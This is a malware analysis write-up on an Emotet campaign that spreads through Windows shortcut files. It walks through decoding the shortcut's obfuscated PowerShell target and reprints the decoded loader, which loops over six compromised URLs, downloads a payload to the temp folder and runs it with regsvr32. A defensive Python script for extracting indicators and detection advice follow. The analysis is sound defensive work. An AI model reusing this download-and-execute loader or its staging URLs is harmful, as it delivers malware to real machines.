Learn about the new method of spreading Emotet malware and how to identify it

By Alexandre Siviero - Emotet is a trojan spread predominantly through fraudulent emails (malspam). The infection can arrive via a malicious script, a macro-enabled document or a malicious link. Emails carrying Emotet often imitate familiar brands or promotions so that they look like a legitimate email.

We obtained a sample of Emotet from the Triage website.

Figure 1: Sample site

The focus of this report is not to explain in detail how Emotet works, but rather how to identify and decode the latest version of the payload that disseminates it. Along the way we name the functions and modules involved in this process, together with references the reader can consult to delve deeper into the subject.

Deobfuscation order

Below is the sample taken from Triage.

Figure 2: sample file

Unlike past campaigns to spread this family of malware, this is not an Office document with malicious macros. The current campaign uses Windows shortcut files (.lnk extension), just like the example above.

To begin the analysis, we inspected the properties of the shortcut in question:

Figure 3: Shortcut properties

In the target field, we noticed something unusual for files of this nature: a PowerShell command that decodes base64 strings. Unfortunately, the content of this shortcut's target is too long to fit in the file's properties window.

To get around this, we used the HxD tool, which allows you to view the contents of any file in hexadecimal. The following image shows part of the base64-encoded string.

Since a string of this kind cannot be read directly by a human, we used the CyberChef tool to decode it, revealing the following code:

Figure 4: display of the shortcut in hexadecimal

Transcribing the hex view as text reveals part of the code contained in the file: the path \Windows\system32\cmd.exe, followed by an invocation of PowerShell (obfuscated as p.^.o.^.w.^.e.^.r.^.s.^.h.^.e.^.l.^.l...e.^.x.^.e) and the base64 string.

c.m.d...e.x.e.............\.....\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.m.d...e.x. e.i./.v.:.o.n. ./.c.
.D.u.X.P.q.w.j.y.n.h.P.K.5.p.0.T.Y.c.a.C.f.4.G.k.A.t.B.W.l.J.m.P.l.w.q.d.5.q.s.n
.f.H.o.5.m.V.y.k.N.t.c.g.e.W.N.2.k.Q.L.m.a.c.K.q.V.A.R.F.E.g.F.V.|.|.g.o.t.o.&.p
.^.o.^.w.^.e.^.r.^.s.^.h.^.e.^.l.^.l...e.^.x.^.e. .-.c. .".&.{. .i.e.x.
.(.[.s.t.r.i.n.g.].[.S.y.s.t.e.m...T.e.x.t...E.n.c.o.d.i.n.g.].:.:.A.S.C.I.I...G
.e.t.S.t.r.i.n.g.(.[.S.y.s.t.e.m...C.o.n.v.e.r.t.].:..F.r.o.m.B.a.s.e.6.4.S.t.r
.i.n.g.(.'.J.F.B.y.b.2.d.y.Z.X.N.z.U.H.J.l.Z.m.V.y.Z.W.5.j.Z.T.0.i.U.2.l.s.Z.W.5
.0.b.H.l.D.b.2.5.0.a.W.5.1.Z.S.I.7.J.G.x.p.b.m.t.z.P.S.g.i.a.H.R.0.c.D.o.v.L.2.h
.v.M.j.g.w.M.z.E.5.M.D.A.x.L.m.h.v.Z.2.l.i.b.y.5.u.Z.X.Q.v.a.W.5.j.b.H.V.k.Z.S.9
.0.Z.1.F.3.e.G.l.j.N.F.F.3.d.U.0.v.I.i.w.i.a.H.R.0.c.D.o.v.L.3.d.3.d.y.5.n.Z.X.J
.v.b.n.R.v.Z.2.V.y.a.W.F.0.c.m.l.h.L.m.9.y.Z.y.9.0.b.X.A.v.Y.0.I.2.Y.2.d.U.V.m.Z
.5.e.V.o.z.Y.j.F.3.O.W.Q.v.I.i.w.i.a.H.R.0.c.D.o.v.L.2.N.s.d.W.J.t.Y.W.5.h.Z.2.V
.y.L.m.5.l.d.C.5.h.c.i.9.w.c.n.V.l.Y.m.E.v.V.k.5.x.c.3.g.z.N.j.h.G.S.H.F.L.S.y.8
.i.L.C.J.o.d.H.R.w.O.i.8.v.b.X.l.t.a.W.N.y.b.2.d.y.Z.W.V.u.L.m.1.p.Z.2.h.0.Y.2.9
.k.Z.S.5.j.b.2.0.v.R.m.9.4.L.U.M.v.b.m.h.N.W.X.d.r.R.l.h.C.L.y.I.s.I.m.h.0.d.H.A
.6.L.y.9.0.b.3.d.h.c.m.R.z.d.W.4.u.b.m.V.0.L.2.F.k.b.W.l.u.L.z.h.O.V.z.J.U.S.m.V
.Q.c.z.h.k.W.m.h.i.L.y.I.s.I.m.h.0.d.H.A.6.L.y.9.o.a.3.d.p.b.m.R.z.Y.W.N.h.Z.G.V
.t.e.S.5.z.e.W.5.v.b.G.9.n.e.S.5.t.Z.S.9.A.Z.W.F.E.a.X.I.v.c.U.g.y.R.U.h.1.d.l.l
.W.b.0.p.F.S.j.I.v.I.i.k.7.Z.m.9.y.Z.W.F.j.a.C.A.o.J.H.U.g.a.W.4.g.J.G.x.p.b.m.t
.z.K.S.B.7.d.H.J.5.I.H.t.J.V.1.I.g.J.H.U.g.L.U.9.1.d.E.Z.p.b.G.U.g.J.G.V.u.d.j.p
.U.R.U.1.Q.L.0.R.3.R.V.h.y.Y.2.d.O.W.G.o.u.U.X.l.V.O.1.J.l.Z.3.N.2.c.j.M.y.L.m.V
.4.Z.S.A.k.Z.W.5.2.O.l.R.F.T.V.A.v.R.H.d.F.W.H.J.j.Z.0.5.Y.a.i.5.R.e.V.U.7.Y.n.J
.l.Y.W.t.9.I.G.N.h.d.G.N.o.I.H.s.g.f.X.0.=.'.).). .}.

When we tried to decode the base64, we realised that the dots between the characters are a consequence of the string being stored as UTF-16LE: each character is followed by a null byte, which the hex viewer's text pane displays as ".". To make the string readable, we used a simple Python script to remove the unnecessary dots:

string = "[STRING IN UNICODE]"  # paste the dotted string transcribed from the hex view here

unistring = string[0]  # the first character is always a real one
for i in range(1, len(string)):
    # In UTF-16LE every ASCII character is followed by a null byte, which the hex
    # viewer shows as ".", so a real character is the one right after a ".".
    if string[i-1] == ".":
        # Three dots in a row (e.g. the "." in cmd.exe): the middle one is the real
        # character and the third is its null byte, which must be dropped.
        if string[i-2] == "." and string[i] == ".":
            pass
        else:
            unistring += string[i]

print(unistring)

This returns the following result:

"C:\Windows\system32\cmd.exe" /v:on /c DuXPqwjynhPK5p0TYcaCf4GkAtBWlJmPlwqd5qsnfHo5mVykNtcgeWN2kQLmacKqVARFEgFV||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{ iex ([string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2hvMjgwMzE5MDAxLmhvZ2liby5uZXQvaW5jbHVkZS90Z1F3eGljNFF3dU0vIiwiaHR0cDovL3d3dy5nZXJvbnRvZ2VyaWF0cmlhLm9yZy90bXAvY0I2Y2dUVmZ5eVozYjF3OWQvIiwiaHR0cDovL2NsdWJtYW5hZ2VyLm5ldC5hci9wcnVlYmEvVk5xc3gzNjhGSHFLSy8iLCJodHRwOi8vbXltaWNyb2dyZWVuLm1pZ2h0Y29kZS5jb20vRm94LUMvbmhNWXdrRlhCLyIsImh0dHA6Ly90b3dhcmRzdW4ubmV0L2FkbWluLzhOVzJUSmVQczhkWmhiLyIsImh0dHA6Ly9oa3dpbmRzYWNhZGVteS5zeW5vbG9neS5tZS9AZWFEaXIvcUgyRUh1dllWb0pFSjIvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0R3RVhyY2dOWGouUXlVO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvRHdFWHJjZ05Yai5ReVU7YnJlYWt9IGNhdGNoIHsgfX0='))) }"

With the help of the CyberChef tool, it is possible to decode the base64 string above. We can finally read the attacker's intentions clearly:

$ProgressPreference="SilentlyContinue";
$links=("http://ho280319001.hogibo.net/include/tgQwxic4QwuM/",
        "http://www.gerontogeriatria.org/tmp/cB6cgTVfyyZ3b1w9d/",
        "http://clubmanager.net.ar/prueba/VNqsx368FHqKK/",
        "http://mymicrogreen.mightcode.com/Fox-C/nhMYwkFXB/",
        "http://towardsun.net/admin/8NW2TJePs8dZhb/",
        "http://hkwindsacademy.synology.me/@eaDir/qH2EHuvYVoJEJ2/");
foreach ($u in $links) {
    try {
        IWR $u -OutFile $env:TEMP/DwEXrcgNXj.QyU;
        Regsvr32.exe $env:TEMP/DwEXrcgNXj.QyU;
        break
    }
    catch { }
}

The code above holds six URLs in a variable named links. The loop tries each address in turn: it downloads the content with IWR (the alias of Invoke-WebRequest) to the temporary folder ($env:TEMP/DwEXrcgNXj.QyU) and runs it with regsvr32.exe, the utility used to register DLLs, which loads the file and executes its registration routine. If this succeeds, the loop is terminated with break. The idea behind this code is to provide alternative sources for the final payload: if one address is unavailable, the empty catch block swallows the error and the same procedure is tried for the next one on the list.
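The whole decoding chain described above (UTF-16LE target, caret-obfuscated powershell, base64 argument, download loop) can be automated for triage. The following Python script is an added example, not part of the original report: it builds a constructed sample modelled on the shortcut (placeholder URLs and file name, not the real ones) and extracts the indicators a defender would want, decoding the UTF-16LE bytes directly rather than stripping dots by hand.

```python
import base64
import re

# Constructed sample modelled on the shortcut analysed above: a caret-obfuscated
# "powershell" call whose base64 argument hides a download loop. The URLs and
# the dropped file name are placeholders, not the ones from the real sample.
_INNER_PS = (
    '$ProgressPreference="SilentlyContinue";'
    '$links=("http://a.example.invalid/x/","http://b.example.invalid/y/");'
    'foreach ($u in $links) {try {IWR $u -OutFile $env:TEMP/SAMPLE.dat;'
    'Regsvr32.exe $env:TEMP/SAMPLE.dat;break} catch { }}'
)
_B64 = base64.b64encode(_INNER_PS.encode("ascii")).decode("ascii")
SAMPLE_TARGET = (
    '"C:\\Windows\\system32\\cmd.exe" /v:on /c XyZ||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c '
    '"&{ iex ([string][System.Text.Encoding]::ASCII.GetString('
    "[System.Convert]::FromBase64String('" + _B64 + "'))) }\""
)
# A .lnk stores its target as UTF-16LE, which is what the hex viewer showed.
SAMPLE_UTF16LE = SAMPLE_TARGET.encode("utf-16-le")

def hex_view(raw: bytes) -> str:
    """Render bytes the way HxD's text pane does: non-printables become '.'."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)

def decode_target(raw: bytes) -> str:
    """Decode the UTF-16LE bytes directly instead of stripping dots by hand."""
    return raw.decode("utf-16-le")

def extract_indicators(raw: bytes) -> dict:
    """Follow the whole chain: UTF-16LE -> cmd line -> base64 -> PowerShell."""
    # cmd.exe discards '^' escapes, so p^o^w^e^r^s^h^e^l^l.e^x^e is powershell.exe
    cmd = decode_target(raw).replace("^", "")
    m = re.search(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", cmd)
    if not m:
        raise ValueError("no FromBase64String payload found in target")
    ps = base64.b64decode(m.group(1)).decode("ascii")
    drop = re.search(r"-OutFile\s+(\S+?);", ps)
    return {
        "powershell": "powershell.exe" in cmd.lower(),
        "urls": re.findall(r'"(https?://[^"]+)"', ps),
        "drop_path": drop.group(1) if drop else None,
        "regsvr32": "regsvr32.exe" in ps.lower(),
    }

if __name__ == "__main__":
    print(hex_view("cmd.exe".encode("utf-16-le")))  # c.m.d...e.x.e.
    print(extract_indicators(SAMPLE_UTF16LE))
```

The extracted URLs and the drop path under $env:TEMP are the values worth feeding into proxy and endpoint detections, together with the parent/child chain cmd.exe -> powershell.exe -> regsvr32.exe loading a file from the temp folder.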

Recommendations

We are all targets of Emotet. To date, Emotet has hit individuals, companies and government entities all over the world, stealing bank logins, financial data and even bitcoin wallets.

Of particular note is an Emotet attack on the city of Allentown, PA, which required the direct help of Microsoft's incident response team to clean up and cost the city more than 1 million dollars to remediate.

Now that Emotet is being used to download and spread other banking trojans, the list of targets could be even wider. The first versions of Emotet were used to attack bank customers in Germany. Later versions targeted organizations in Canada, the United Kingdom and the United States. The campaigns seen in 2022, on the other hand, target the whole world; one example carried the subject line "buona pasqua, happy Easter" and a malicious XLS attachment used to spread and "install" Emotet.

References

  1. https://pt.malwarebytes.com/emotet/
  2. https://www.checkpoint.com/press/2022/february-2022s-most-wanted-malware-emotet-remains-number-one-while-trickbot-slips-even-further-down-the-index/
  3. https://www.youtube.com/watch?v=-W4yZifokx0
  4. https://canaltech.com.br/seguranca/governo-do-japao-lanca-ferramenta-que-detecta-nova-versao-do-malware-emotet-215176/